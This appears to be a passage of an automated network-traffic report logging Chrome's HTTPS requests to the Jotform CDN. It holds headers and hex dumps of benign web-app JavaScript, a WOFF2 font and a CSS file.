                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 6376
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:39:16 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 258
                                                                                                                                                                                                                                            last-modified: Thu, 12 Dec 2024 12:31:15 GMT
                                                                                                                                                                                                                                            etag: "ebc9f7b2083e930685a7bd68e8a9b982"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b26ecc7288-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC942INData Raw: 66 75 6e 63 74 69 6f 6e 20 53 28 6e 29 7b 76 61 72 20 72 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3c 6e 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6e 5b 72 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 72 65 74 75 72 6e 20 72 3f 72 2e 63 61 6c 6c 28 6e 29 3a 7b 6e 65 78 74 3a 53 28 6e 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 55 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 79 3d 5b 5d 3b 21 28 72 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b
                                                                                                                                                                                                                                            Data Ascii: function S(n){var r=0;return function(){return r<n.length?{done:!1,value:n[r++]}:{done:!0}}}function T(n){var r="undefined"!=typeof Symbol&&Symbol.iterator&&n[Symbol.iterator];return r?r.call(n):{next:S(n)}}function U(n){for(var r,y=[];!(r=n.next()).done;
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 3d 7b 63 3a 62 2e 63 7d 2c 2b 2b 65 29 7b 62 2e 63 3d 61 5b 65 5d 3b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 55 52 4c 28 22 22 2c 62 2e 63 29 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 70 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 55 52 4c 28 70 7c 7c 22 22 2c 67 2e 63 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 7d 7d 28 62 29 7d 63 61 74 63 68 28 67 29 7b 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 67 7c 7c 22 22 7d 7d 66 75 6e 63 74 69 6f 6e 20 45 28 61 2c 62 29 7b 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 29 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 62 29 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 65 2c 62 5b 65 5d 29 3b 64 6f 63 75 6d
                                                                                                                                                                                                                                            Data Ascii: ={c:b.c},++e){b.c=a[e];try{return new URL("",b.c),function(g){return function(p){return(new URL(p||"",g.c)).toString()}}(b)}catch(g){}}return function(g){return g||""}}function E(a,b){a=document.createElement(a);for(var e in b)a.setAttribute(e,b[e]);docum
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 3b 0a 6b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 65 6c 22 2c 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 73 74 61 72 74 75 70 2d 69 6d 61 67 65 22 29 3b 6b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6d 65 64 69 61 22 2c 22 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 20 22 2b 66 2b 22 29 22 29 3b 6b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 2c 63 29 3b 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6b 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 66 2c 63 29 7b 76 61 72 20 6b 3d 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 2c 6d 3d 65 28 6b 2e 61 76 61 69 6c 57 69 64 74 68 2c 6b 2e 61 76 61 69 6c 48 65 69 67 68 74 2c 22 70 6f 72 74 72 61 69 74 22 2c 66 29 2c 64 3d 65 28 6b 2e
                                                                                                                                                                                                                                            Data Ascii: Element("link");k.setAttribute("rel","apple-touch-startup-image");k.setAttribute("media","(orientation: "+f+")");k.setAttribute("href",c);document.head.appendChild(k)}function p(f,c){var k=window.screen,m=e(k.availWidth,k.availHeight,"portrait",f),d=e(k.
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 3d 61 2e 64 69 73 70 6c 61 79 3b 71 3d 2d 31 21 3d 3d 58 2e 69 6e 64 65 78 4f 66 28 4e 29 3b 68 28 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 2c 71 29 3b 59 28 61 2e 74 68 65 6d 65 5f 63 6f 6c 6f 72 7c 7c 22 62 6c 61 63 6b 22 2c 57 29 3b 5a 26 26 28 68 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 2c 61 2e 73 68 6f 72 74 5f 6e 61 6d 65 29 2c 68 28 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 6f 6f 6c 74 69 70 22 2c 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 29 2c 0a 68 28 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 73 74 61 72 74 75 72 6c 22 2c 62 28 61 2e 73 74 61 72 74 5f 75 72 6c 7c 7c 22 2e 22 29 29 2c 68 28 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 2c 61 2e 74
                                                                                                                                                                                                                                            Data Ascii: =a.display;q=-1!==X.indexOf(N);h("mobile-web-app-capable",q);Y(a.theme_color||"black",W);Z&&(h("application-name",a.short_name),h("msapplication-tooltip",a.description),h("msapplication-starturl",b(a.start_url||".")),h("msapplication-navbutton-color",a.t
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1327INData Raw: 3a 7b 74 72 79 7b 76 61 72 20 67 3d 57 69 6e 64 6f 77 73 2e 55 49 2e 56 69 65 77 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 70 70 6c 69 63 61 74 69 6f 6e 56 69 65 77 2e 67 65 74 46 6f 72 43 75 72 72 65 6e 74 56 69 65 77 28 29 2e 74 69 74 6c 65 42 61 72 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 70 29 7b 7d 67 3d 76 6f 69 64 20 30 7d 69 66 28 62 3d 67 29 62 2e 66 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 50 28 65 3f 22 62 6c 61 63 6b 22 3a 22 77 68 69 74 65 22 29 2c 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 50 28 61 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 28 61 29 7b 61 3d 51 28 61 29 3b 72 65 74 75 72 6e 7b 72 3a 61 5b 30 5d 2c 67 3a 61 5b 31 5d 2c 62 3a 61 5b 32 5d 2c 61 3a 61 5b 33 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 51 28 61 29 7b 76 61 72
                                                                                                                                                                                                                                            Data Ascii: :{try{var g=Windows.UI.ViewManagement.ApplicationView.getForCurrentView().titleBar;break a}catch(p){}g=void 0}if(b=g)b.foregroundColor=P(e?"black":"white"),b.backgroundColor=P(a)}}}function P(a){a=Q(a);return{r:a[0],g:a[1],b:a[2],a:a[3]}}function Q(a){var


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.1749706172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC578OUTGET /fonts/circular/fonts/Circular-Bold.woff2 HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            last-modified: Fri, 17 May 2024 07:14:50 GMT
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=315360000
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b2ae9e80d3-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC961INData Raw: 37 64 64 33 0d 0a 77 4f 46 32 00 01 00 00 00 01 23 cf 00 12 00 00 00 03 af 58 00 01 21 8e 00 03 00 00 00 01 21 f8 00 00 01 d7 00 00 04 9f 00 00 00 00 00 00 00 00 1b 81 d1 1e 1c a5 68 14 85 77 06 60 00 89 0a 08 62 09 82 73 11 10 0a 89 e1 34 89 87 16 12 81 f9 38 01 36 02 24 03 97 4c 0b 97 50 00 04 20 05 8c 0a 07 b5 01 0c 85 41 5b 2b 75 b3 04 a2 c9 d8 dd 93 be 6b 59 b5 62 3a 0b a0 c8 ce d1 b6 55 91 03 d2 3f ea 05 36 1d 78 5d e9 36 04 dc 3e 13 5f fd 66 99 2e e0 36 9d 78 2b ae 37 03 75 ea 35 18 de ec ff ff ff ff ff ff ff ff ff 7d c9 42 64 f3 ff 92 dc 7f d2 a6 2d b5 85 56 05 44 98 08 4e 9d db 84 90 44 34 9a 76 77 71 90 8b 37 6d 51 ae 5a 53 b5 eb 4b ce 83 6d 36 a3 eb 81 0f 32 cd c2 ad ea 13 de c1 65 05 ae 18 dd 23 b8 3c 4a a7 8c bd a2 36 e8 db f0 2d 6c 72 84 27
                                                                                                                                                                                                                                            Data Ascii: 7dd3wOF2#X!!hw`bs486$LP A[+ukYb:U?6x]6>_f.6x+7u5}Bd-VDND4vwq7mQZSKm62e#<J6-lr'
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 13 65 78 e9 e5 ff 3f 0e da 7d df d6 12 69 02 6c b2 20 48 bc 59 49 35 09 c4 0e aa 70 d9 85 e9 6c 1d 38 e7 8b 6c 62 37 38 48 83 ae 2a 1e 11 76 ff 53 2d 55 0a 81 3c 12 5c 80 00 f8 1f 88 e3 69 09 12 d8 14 14 56 ca 55 9c 5e b2 5d e6 da b9 0d a9 b5 8b 4e 2e ba 73 51 ba ea 3c 6f 53 eb 7f 3f 5e f6 7c f8 87 db 9f d3 96 9a 4c eb 5b 9a a7 55 c7 4e fe 24 99 71 6c 3c 80 63 c7 0e c8 a6 cb 08 21 40 08 15 5c 98 b7 14 b0 f3 4f d0 ca 28 af 26 b2 ad 02 04 20 44 36 6c b7 7f 2f 89 03 73 ed 84 88 b6 75 b7 38 80 5f 6c 86 ac 89 98 6a bd 88 c0 7f 00 3f b9 e9 36 97 ab 91 dc fd 6a ee dd f6 e8 f6 99 ab 61 2e 8b 46 ce 3a 15 5c f0 82 e3 6b 93 be 7a 2a 6d 46 d3 86 05 42 04 32 e3 f9 2b 66 87 cb 7d ff 1e 9b 56 4f ff 4b 5f 42 08 21 40 12 42 1c 42 06 41 24 4c 44 0e 3b 81 3e e4 39 9c 5e 33
                                                                                                                                                                                                                                            Data Ascii: ex?}il HYI5pl8lb78H*vS-U<\iVU^]N.sQ<oS?^|L[UN$ql<c!@\O(& D6l/su8_lj?6ja.F:\kz*mFB2+f}VOK_B!@BBA$LD;>9^3
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 48 6c 3f 8b 68 62 d9 ce 5d 87 c7 37 5b c5 97 a8 5e 56 f9 c0 21 a7 de d2 33 93 17 1b 53 f5 2c 42 48 a0 82 49 af e7 39 c4 ad da 2c 5d 38 75 28 a2 95 d4 68 4a 1b 9d 89 2d f7 ef fe b3 66 18 ef 83 60 c1 06 71 80 38 08 8e a2 a7 94 7a 4b df f5 c3 9f 6a 4f b2 33 e6 51 77 91 6c 86 6b 81 84 04 e8 31 b6 9b 8f ef fa 8f 6d 56 1f 8c 42 52 56 f1 54 3c 88 8d e0 2b 87 8b 37 3f dd ac 99 05 00 df b5 0d e0 82 89 24 4b 76 32 ff 1e 6b 56 a9 7d af 0d f7 5d 36 86 e9 14 6d 33 0a 52 60 05 78 25 13 c0 b4 a6 60 00 6f b3 5d ac 1e 58 9c 72 64 55 29 b0 81 02 74 60 c0 24 29 ec 96 07 85 f1 81 ea 4f b0 9e 0f fc fe 24 eb f9 20 7c d7 84 58 3e 48 dc 2b 21 8e 0f 32 f6 49 8e e1 83 82 ea 1a 08 e1 3b 1f 46 9c 8f 20 cd 47 91 e7 63 50 e6 63 59 bc 2b c2 b1 44 fd 67 aa 34 81 bc 9f bb a0 93 0b 2b 4a
                                                                                                                                                                                                                                            Data Ascii: Hl?hb]7[^V!3S,BHI9,]8u(hJ-f`q8zKjO3Qwlk1mVBRVT<+7?$Kv2kV}]6m3R`x%`o]XrdU)t`$)O$ |X>H+!2I;F GcPcY+Dg4+J
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 3b ec db 74 b9 6e 8a 91 d6 03 1d 37 65 f7 c6 0f af 05 dd dd 3c 10 5c 07 c3 ba b4 08 ab 85 62 b9 5d 4f 63 fe b4 b6 69 4e 0e 0f cb af a7 09 17 e0 15 f4 eb 76 b9 a8 97 9f 57 7f 1a 20 11 7b 21 f1 a8 e5 4c f9 85 ad 48 b6 12 21 fe 16 92 86 8c 4a 17 40 85 d8 52 5c 29 3e 9f 10 22 e6 91 22 e4 20 a5 d4 5d 39 64 59 3e da ae 9b b0 27 cf 4d c6 f9 45 b8 65 9b 43 9c 13 8a db b9 e5 27 81 7f 8e 98 cf 63 cf 5b cb e5 6f cf 88 b6 8a 9d f0 20 3d e2 27 2a 04 d4 82 94 a0 d7 65 f4 d9 90 9d 60 76 a4 5e 5b fb c6 36 89 ca 44 3f 6b b5 a4 e5 e0 da 21 33 db 62 77 5f cd 0e 27 0b 58 83 70 b3 8e c1 1c 58 8a f5 c2 6a be e0 87 45 98 59 95 54 e4 d9 92 3e a8 54 08 da 04 83 e4 b2 dc 63 c5 89 c6 68 ab 2c 75 0b 99 b8 4d db 52 46 fe b8 b5 a8 3a 9a 0d 71 25 05 92 42 d0 e6 28 d9 0b 6d 73 0d 34 43
                                                                                                                                                                                                                                            Data Ascii: ;tn7e<\b]OciNvW {!LH!J@R\)>"" ]9dY>'MEeC'c[o ='*e`v^[6D?k!3bw_'XpXjEYT>Tch,uMRF:q%B(ms4C
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 3f ed fa db 8f 02 31 47 b0 2e 96 47 65 ff c9 bd b3 ea cd a6 0f e3 eb ea 0a 78 c0 af be 5c 58 bd e5 2f d1 20 fc ed 8d f6 56 b4 33 39 c0 c7 b8 bb 80 db 72 84 03 5c fc b0 b7 58 cd f8 8f 52 63 a0 72 6c 15 2e 41 ca b6 c5 dc 39 0e a8 73 34 97 2e b9 ab 58 86 6d 8a 3f b4 e5 b8 44 fe e1 b2 c3 95 16 92 85 ce 4d df 6d 89 b5 8d 47 69 28 56 bd a8 5b a5 a9 18 6c 72 84 94 4e 42 4d 49 e0 89 b7 cf ea 3c 40 df 8e 65 4b a6 83 ab 20 76 5d 04 b8 cb c7 95 ad eb 44 cb 9e 60 7f 84 28 24 28 94 52 ae 00 e9 8c e7 90 a7 97 d6 c3 9d df 49 8c ed 5d 24 29 9d 07 79 0d 97 e4 24 4c 67 ea 90 4b 28 d5 ea 74 7b 92 0e f4 38 1c d3 fa e5 dd c5 23 39 81 a3 bc 18 29 4a f5 38 f6 98 42 01 d6 06 bd 4f fc f9 63 75 32 48 92 95 90 60 e7 f9 3d 45 b8 08 11 90 52 43 64 b9 36 a9 3a 5f 55 71 09 5f 34 77 03
                                                                                                                                                                                                                                            Data Ascii: ?1G.Gex\X/ V39r\XRcrl.A9s4.Xm?DMmGi(V[lrNBMI<@eK v]D`($(RI]$)y$LgK(t{8#9)J8BOcu2H`=ERCd6:_Uq_4w
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 0c 74 0c f4 68 b6 69 76 69 f6 69 06 34 43 d4 c8 d0 18 35 31 34 45 cd 0c cd 51 0b 43 0f 1c cb 58 c7 04 f6 05 0e 05 8e 05 ce 04 ce 51 3a 1a 3d ca 40 63 44 99 68 cc 28 0b cd a5 c0 b5 80 d5 98 dd 98 d3 98 db 98 97 e4 27 05 49 61 a1 a8 50 5c 28 29 94 16 ca 0a e5 31 05 a5 7b d0 23 e8 19 04 81 60 1d 08 03 ea 1a 8c 01 47 11 34 94 31 86 f4 c3 da 56 ea 7a 19 13 26 a6 66 cd 7c 4f 18 1a 8e 40 a2 0a 6d 10 83 c5 e1 09 44 12 99 42 2d 9a a0 92 72 59 10 2d ad ac 9b cd be 61 dc c4 a8 13 03 c3 66 b4 6f a8 97 5c e9 44 af e9 4f 0d 76 ca 46 18 a3 b8 75 a7 6f 36 6a 34 83 77 e9 a1 5f 06 ba 86 cd 68 4f a0 b0 17 50 03 2f 9e 43 a9 54 2a f7 97 a3 55 88 3c 32 37 b6 04 0b 80 33 90 c0 10 28 2c da 5a 5a b6 c9 6f 05 08 02 09 6c 47 5b 64 9d 1f c3 8d 3c 04 99 b5 40 4a 10 1a 78 42 cf d5 6a
                                                                                                                                                                                                                                            Data Ascii: thivii4C514EQCXQ:=@cDh('IaP\()1{#`G41Vz&f|O@mDB-rY-afo\DOvFuo6j4w_hOP/CT*U<273(,ZZolG[d<@JxBj
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 64 0a b5 68 c2 4a ca de cb c2 b2 a5 95 75 b3 79 d1 50 88 48 f3 75 49 ed 1f 12 c5 24 07 8e c4 24 a4 62 9b b8 ff 29 20 19 50 c0 0a 0e 37 38 66 81 bd 3d b5 64 aa 6b aa 6b da 67 3a 7d 66 cb ac d8 59 17 67 6b 67 a7 ce 36 cd 6e 1c 6d 1a 0d 8c 46 e7 20 a9 eb 58 05 58 5d 47 4f d9 66 a4 86 71 9d a7 31 77 a2 fe c1 d8 b0 67 71 f4 ec 66 2c 8d a3 e7 2c c0 d5 e3 ba 15 3e 80 48 05 d0 4a 97 25 cf 34 65 6a d5 fb 5b b3 c3 5a b5 39 e2 b6 8f 06 8c 18 37 b1 e5 22 c9 db ce ae 3f 4d 48 2d c0 b1 e3 27 6e 7b ea f4 99 b3 e7 ce 5f b8 78 89 fb 3d 75 ef d6 85 c1 29 59 f0 e3 5c 25 04 9a 20 7a ac af 92 28 f1 a1 cf 1f ef 08 f0 b3 76 92 d5 6e 8d b5 1f e9 f3 d8 17 e6 00 5f e0 3b 55 52 27 43 32 26 53 e6 90 de fc 47 80 39 7a 67 64 4e 68 4d 04 31 09 29 99 af 96 33 29 2f 09 f0 78 ec 06 8c 4d
                                                                                                                                                                                                                                            Data Ascii: dhJuyPHuI$$b) P78f=dkkg:}fYgkg6nmF XX]GOfq1wgqf,,>HJ%4ej[Z97"?MH-'n{_x=u)Y\% z(vn_;UR'C2&SG9zgdNhM1)3)/xM
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 32 94 98 50 e0 64 f4 41 c6 fe 63 7a b4 98 08 9d 29 58 27 15 25 e4 44 d4 c5 44 d1 ca 12 89 23 5a 96 18 46 b1 5e e2 64 89 9f 4e 25 64 20 95 f1 95 8d e4 e6 a0 6a 96 e5 50 46 7b 86 56 6d f9 a7 ae 67 65 e9 0a 7d e9 57 3e ca e7 0c 60 d0 90 61 23 65 54 96 9f 7e 37 13 93 40 90 e2 40 98 98 74 a8 21 cd 8b bc b8 59 e3 19 33 29 27 47 f2 14 a4 a8 1e 16 0b 4e 89 94 94 05 d3 b0 16 b5 87 38 3d 92 c7 9e 78 ba af 87 31 2f 64 d5 2e 67 2f bd f2 ba e9 9d c2 80 62 22 94 18 64 b1 0e 39 ac 55 9b 8f 3e 1b 30 68 c8 70 33 32 49 fc b0 18 ad 12 bc ca 60 4a 8f 05 5e 42 4c 3d b1 5f 04 04 24 bd 44 17 dc f4 04 df ef a4 bf 7c 4f 44 fd 44 1c 49 e2 99 e3 4d 62 39 53 18 8b 0e 89 10 c1 88 c5 c8 c0 c0 c8 48 40 4c 4c c6 82 91 81 81 81 81 8c 91 8c 91 91 81 81 81 81 81 81 81 91 91 91 91 91 91 80
                                                                                                                                                                                                                                            Data Ascii: 2PdAcz)X'%DD#ZF^dN%d jPF{Vmge}W>`a#eT~7@@t!Y3)'GN8=x1/d.g/b"d9U>0hp32I`J^BL=_$D|ODDIMb9SH@LL
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: d0 7e 85 8e 23 b0 2a 8d 32 e1 86 e6 b4 48 a5 45 75 9b 54 1a e3 02 0a 8f 16 e8 b9 47 25 b4 c8 a2 4c 94 8f df f1 9b f7 32 8f 70 25 ba 66 ef 38 ec 73 fe 9e 17 7e f0 54 99 2b 5e 4e 1d ea 7a 97 bd 09 a2 e5 a9 27 fa a0 25 1d 14 8a 12 36 d5 53 53 4e aa 6e 53 99 42 85 66 a8 0e 6c 9a 28 cb 6c fc d9 87 55 8f f6 a8 9d f5 37 a7 15 b0 50 89 38 1b 96 5b 75 24 90 6d 37 c3 29 7b 48 c5 95 3a 57 56 54 4a ea f9 ed 79 6d 9c c5 7f 1c ec 9f e2 dc 2c 55 3c be 90 fd 44 b9 49 7f 33 16 55 c6 e1 0b bd f5 9d 07 3a 74 4f fe 64 ce dd 39 fc 1b 6d 7e 7d 4f cb f7 ec e9 d7 df f6 3a 9a c7 f1 2c 2e b0 9f cf d8 23 03 e2 8a a1 f2 32 07 c7 7d 21 c1 51 d3 56 ca 2d a2 cd 7e 30 48 8d a5 8d 6d 99 05 93 10 f3 2f fb d4 1e a3 7e 70 41 7d 07 a8 66 a8 23 ad 1c a3 4a ba 05 47 99 b8 09 e8 7b 89 ab 02 e0
                                                                                                                                                                                                                                            Data Ascii: ~#*2HEuTG%L2p%f8s~T+^Nz'%6SSNnSBfl(lU7P8[u$m7){H:WVTJym,U<DI3U:tOd9m~}O:,.#2}!QV-~0Hm/~pA}f#JG{
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: ff a2 15 0e 01 57 9e 02 45 48 90 26 db 64 65 66 a8 b3 d4 2a 1b fd 0d 74 18 60 44 34 5c 42 52 6e bc 04 89 94 28 5d 8e 29 4c 6a d5 5b 66 b5 4d 9a 6f 5b 9a 61 b6 c6 23 02 d1 13 6f c1 a2 24 31 c8 35 55 b9 99 e6 5b 6e 8d cd b6 6f df 45 91 d1 d9 70 20 a7 e2 23 44 b4 64 19 6f 2f 7c 5d 61 96 05 1a ac b5 45 4b f1 18 94 b1 f1 dc 91 13 77 be 42 c5 d0 31 ca 37 5d a5 d9 16 fa c3 3a 5b ed 28 9f c3 b2 c0 64 47 cc 99 9a 1f ad 58 7a 99 0a 14 ab 32 c7 22 2b 34 d9 66 e7 c6 e3 58 c6 f8 ff 91 84 0b 0f fe c2 c4 49 91 a5 50 89 6a 73 2d b6 d2 7a 7f da 65 f7 cb 2d ae 42 fa ce ca 2f b0 b2 84 0c 28 3a a6 b4 ac 04 19 5e ff 4f 58 96 90 1f aa 4e 99 3a 39 17 65 67 65 f9 c5 a8 1d 0e c8 71 43 a3 cb ef b4 dc e2 2a 34 c4 51 75 49 05 1a a9 e8 f4 8a 82 52 34 7e 3c fb 19 f6 d2 17 57 53 4b 8b
                                                                                                                                                                                                                                            Data Ascii: WEH&def*t`D4\BRn(])Lj[fMo[a#o$15U[noEp #Ddo/|]aEKwB17]:[(dGXz2"+4fXIPjs-ze-B/(:^OXN:9egeqC*4QuIR4~<WSK


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            9192.168.2.1749708172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC570OUTGET /stylebuilder/static/donationBox.css?v=3ff9d3e HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            jf-trace-id: 520666d49d34d713
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /stylebuilder/static/*slug
                                                                                                                                                                                                                                            last-modified: Wed, 25 Dec 2024 09:00:03 GMT
                                                                                                                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 258
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b2b8e94361-EWR
